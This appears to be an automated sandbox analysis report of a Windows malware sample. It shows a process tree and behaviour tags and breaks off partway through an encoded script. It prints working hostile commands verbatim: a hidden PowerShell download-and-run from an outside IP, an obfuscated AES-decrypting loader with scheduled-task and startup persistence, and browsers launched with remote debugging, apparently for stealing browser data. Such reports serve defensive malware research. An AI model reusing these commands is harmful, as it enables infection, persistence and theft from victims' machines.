TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE 98 PID 1196 wrote to memory of 4040 1196 TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE 98 PID 1196 wrote to memory of 4040 1196 TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE 98 PID 4040 wrote to memory of 2196 4040 skotes.exe 99 PID 4040 wrote to memory of 2196 4040 skotes.exe 99 PID 4040 wrote to memory of 2196 4040 skotes.exe 99 PID 4040 wrote to memory of 3244 4040 skotes.exe 101 PID 4040 wrote to memory of 3244 4040 skotes.exe 101 PID 4040 wrote to memory of 3244 4040 skotes.exe 101 PID 2196 wrote to memory of 2324 2196 powershell.exe 103 PID 2196 wrote to memory of 2324 2196 powershell.exe 103 PID 2196 wrote to memory of 2324 2196 powershell.exe 103 PID 2324 wrote to memory of 4656 2324 cmd.exe 105 PID 2324 wrote to memory of 4656 2324 cmd.exe 105 PID 2324 wrote to memory of 4656 2324 cmd.exe 105 PID 2324 wrote to memory of 4836 2324 cmd.exe 106 PID 2324 wrote to memory of 4836 2324 cmd.exe 106 PID 2324 wrote to memory of 4836 2324 cmd.exe 106 PID 3244 wrote to memory of 4332 3244 powershell.exe 109 PID 3244 wrote to memory of 4332 3244 powershell.exe 109 PID 3244 wrote to memory of 4332 3244 powershell.exe 109 PID 4332 wrote to memory of 1912 4332 cmd.exe 111 PID 4332 wrote to memory of 1912 4332 cmd.exe 111 PID 4332 wrote to memory of 1912 4332 cmd.exe 111 PID 4332 wrote to memory of 1464 4332 cmd.exe 112 PID 4332 wrote to memory of 1464 4332 cmd.exe 112 PID 4332 wrote to memory of 1464 4332 cmd.exe 112 PID 4836 wrote to memory of 708 4836 powershell.exe 113 PID 4836 wrote to memory of 708 4836 powershell.exe 113 PID 4836 wrote to memory of 708 4836 powershell.exe 113 PID 1464 wrote to memory of 3208 1464 powershell.exe 114 PID 1464 wrote to memory of 3208 1464 powershell.exe 114 PID 1464 wrote to memory of 3208 1464 powershell.exe 114 PID 4040 wrote to memory of 4624 4040 skotes.exe 116 PID 4040 wrote to memory of 4624 4040 skotes.exe 116 PID 4040 wrote to memory of 4624 4040 skotes.exe 116 PID 4624 wrote to memory of 668 4624 Bjkm5hE.exe 118 PID 4624 wrote to memory of 668 4624 Bjkm5hE.exe 118 PID 668 wrote to memory of 1856 668 chrome.exe 119 PID 668 wrote to memory of 1856 668 chrome.exe 119 PID 668 wrote to memory of 2724 668 chrome.exe 120 PID 668 wrote to memory of 2724 668 chrome.exe 120 PID 668 wrote to memory of 2724 668 chrome.exe 120 PID 668 wrote to memory of 2724 668 chrome.exe 120 PID 668 wrote to memory of 2724 668 chrome.exe 120 PID 668 wrote to memory of 2724 668 chrome.exe 120 PID 668 wrote to memory of 2724 668 chrome.exe 120 PID 668 wrote to memory of 2724 668 chrome.exe 120 PID 668 wrote to memory of 2724 668 chrome.exe 120
Processes
-
C:\Users\Admin\AppData\Local\Temp\bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe"C:\Users\Admin\AppData\Local\Temp\bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn qMNiEmakmJD /tr "mshta C:\Users\Admin\AppData\Local\Temp\DsdV07JDv.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn qMNiEmakmJD /tr "mshta C:\Users\Admin\AppData\Local\Temp\DsdV07JDv.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2776
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\DsdV07JDv.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Users\Admin\AppData\Local\TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE"C:\Users\Admin\AppData\Local\TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1072393041\b6V4Rod.ps1"6⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "8⤵
- System Location Discovery: System Language Discovery
PID:4656
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe8⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:708
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1072396041\b6V4Rod.ps1"6⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "8⤵
- System Location Discovery: System Language Discovery
PID:1912
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3208
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1072397001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1072397001\Bjkm5hE.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffe982cc40,0x7fffe982cc4c,0x7fffe982cc588⤵PID:1856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=1936 /prefetch:28⤵PID:2724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2204,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2176 /prefetch:38⤵PID:4816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2456 /prefetch:88⤵PID:3868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3216 /prefetch:18⤵
- Uses browser remote debugging
PID:4196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3276 /prefetch:18⤵
- Uses browser remote debugging
PID:1436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4548 /prefetch:18⤵
- Uses browser remote debugging
PID:3840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4516,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4772 /prefetch:88⤵PID:3796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4524,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4784 /prefetch:88⤵PID:3956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4908,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4872 /prefetch:88⤵PID:2636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5008,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4756 /prefetch:88⤵PID:2900
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:4996 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe98346f8,0x7fffe9834708,0x7fffe98347188⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:28⤵PID:448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:38⤵
- Suspicious behavior: EnumeratesProcesses
PID:4900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:88⤵PID:3684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:18⤵
- Uses browser remote debugging
PID:1940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:18⤵
- Uses browser remote debugging
PID:3352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:18⤵
- Uses browser remote debugging
PID:4032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:18⤵
- Uses browser remote debugging
PID:384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1072398001\7fOMOTQ.exe"C:\Users\Admin\AppData\Local\Temp\1072398001\7fOMOTQ.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2276
-
-
C:\Users\Admin\AppData\Local\Temp\1072399001\dDFw6mJ.exe"C:\Users\Admin\AppData\Local\Temp\1072399001\dDFw6mJ.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1768 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c 67a27a89a5061.vbs7⤵
- Checks computer location settings
- Modifies registry class
PID:3088 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67a27a89a5061.vbs"8⤵
- Checks computer location settings
PID:2960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@G